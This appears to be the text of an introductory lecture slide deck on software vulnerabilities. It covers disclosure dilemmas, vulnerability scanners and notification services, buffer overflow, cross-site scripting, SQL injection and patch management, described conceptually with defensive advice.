Upload
charleen-lloyd
View
215
Download
0
Embed Size (px)
Citation preview
Vulnerabilities
Vulnerabilities
• flaws in systems that allow them to be exploited
• provide means for attackers to compromise hosts, servers and networks
Vulnerabilities
• 2 flavors
• bugs – programming mistakes
• Errors in code that could cause a system to hang to an insecure state or allow root access• Incorrect firewall/router/IDS rules
• flaws – improper design
• failing to account for all possibilities in design leads to code with vulnerable ‘features’
Vulnerabilities
• 2-edged sword
• publishing vulnerabilities and patches is only way to fix problem
• once published – the network of hackers is aware of the vulnerability
• patch management is a MAJOR security problem!
Vulnerabilities
• ‘Security by Obscurity’
• attempts to use secrecy to prevent knowledge of vulnerabilities
• vendors of proprietary code are often accused of this
• zero-day attack
• attack takes place during the window between when a vulnerability becomes known and a patch is discovered
Between a ‘rock and a hard place’
• what do you do if you discover a vulnerability in a product and a patch is not available?
• do you keep it secret until a patch is developed?
• this leaves customers vulnerable• the vendor may not work to fix it since there is no pressure
• do you publicize it to put pressure on the vendor?
• knowing that by doing so you have notified all of the hacker community
Between a ‘rock and a hard place’
Example 1:
• In 2009 Microsoft announced vulnerability in SMB subsystem that could leave servers vulnerable to DOS attack
• there was no patch yet
• IT managers had two choices
• disable SMB – meaning some systems would not work
• wait for patch and pray there would not be an incident
Between a ‘rock and a hard place’
Example 2:
• in 2008 a Mass. Dist. Judge ordered MIT students to NOT present information at DefCon regarding a vulnerability in the MTA ‘CharlieTicket’ system
• judge said intent was not to silence students but enforce a reasonable period during which a fix could be found
• the gag order was overturned, but not until after DefCon had concluded
http://www.informationweek.com/news/security/vulnerabilities/210002185
Vulnerability Management
• many strategies for managing vulnerabilities
• vulnerability scanners• vulnerability notification• vulnerability information online through CERT• vulnerability and penetration testing services
• these go hand-in-hand with adequate patch management
Vulnerability Scanners• programs that scan a network, host or application for known vulnerabilities
• Types• port scanner – looks for open ports (nmap)• network enumerator – provides information on groups, usernames, shares and services (nmap and nessus)• network vulnerability scanner – looks for vulnerabilities in network resources and servers (nessus, SAINT)• Web application security scanner – looks for vulnerabilities in Web servers and scripts (SAINT, Metasploit Pro)• Database security scanner – Looks for vulnerabilities in DBMS and SQL code (Safety Lab Shadow)
Vulnerability Notification• many vendors will either mail a notification or post to a Web site when a vulnerability has been found and how to patch it
• services exist that maintain vulnerability lists for multiple products and will provide notification
• with many of these you provide a list of the software and versions in your organization
Vulnerability Notification• examples
• Vupen Security vulnerability services
http://www.vupen.com/english/services/
• SecureNet Solutions vulnerability notification service
http://www.securenetsol.com/am_trial_terms.html
• Secundia CSI free for home users
http://secunia.com/vulnerability_scanning/personal/
Vulnerability Notification
• CERT (Computer Emergency Response Team) at CMU
• provides weekly list of known vulnerabilities
• organization security team matches inventory of software and versions to this list
http://www.cert.org/advisories/
http://www.us-cert.gov/cas/bulletins/
Threats – the counterpart to vulnerabilities• Threats exploit vulnerabilities
• vulnerability – you left your car unlocked• threat – criminals going through shopping center parking lots looking for unlocked cars
• Fortinet’s FortiGuard Center Threat Research and Response Center provides Threat reports and advisories
http://www.fortiguard.com/
• Awareness of threat landscape can help to prioritize vulnerabilities
Top 3 Application Vulnerabilities1 – Buffer overflow
• software may not enforce array bounds• can allow buffers (arrays used for I/O) to overflow and overwrite code area• some malware works this way ‘smashing the stack’• mainly aimed at systems that allow code to be executed with privileged rights
• best addressed in design and programming• patches can often fix this in vendor-supplied software
http://www.windowsecurity.com/articles/Analysis_of_Buffer_Overflow_Attacks.html
http://www.youtube.com/watch?v=kZZgNnhxA_4 (6 min)
Top 3 Application VulnerabilitiesAccording to CERT
2 – cross-site scripting
• code is injected into communications from a Web site• most ‘drive-by’ malware uses this method• often relies on social engineering to get user to follow link (Banks are especially targeted)
• Web script writers can validate input and clense output• script disabling (although not always practical)• use of least-privilege account
http://www.ibm.com/developerworks/tivoli/library/s-csscript/
Top 3 Application VulnerabilitiesAccording to CERT
3 – SQL injection
• commands passed through Web form to SQL DBMS• can exploit lack of security and gain control of server
• solution is to add code to validate input
http://www.youtube.com/watch?v=jMQ2wdOmMIA (3 min)
Vulnerability ManagementGartner defines 6 steps for vulnerability management
• Define policy• Baseline the environment• Prioritize vulnerabilities• Mitigate vulnerabilities• Maintain and monitor
Patch Management• requires coordinated effort
• knowing which patches are available• testing patches• scheduling patch installation
http://www.patchmanagement.org/pmessentials.asp
• however – many systems remain unpatched
• some applications (such as firefox) push patches
• others (such as adobe) allow users to decide
Patch Management• although recognized as a major security problem – patch management is seen as a burden by traditional IT management
• it sucks up resources• it adds nothing to the bottom-line
http://www.computerworld.com.au/article/44872/patch_management_burdens_customers/?fp=16&fpid=0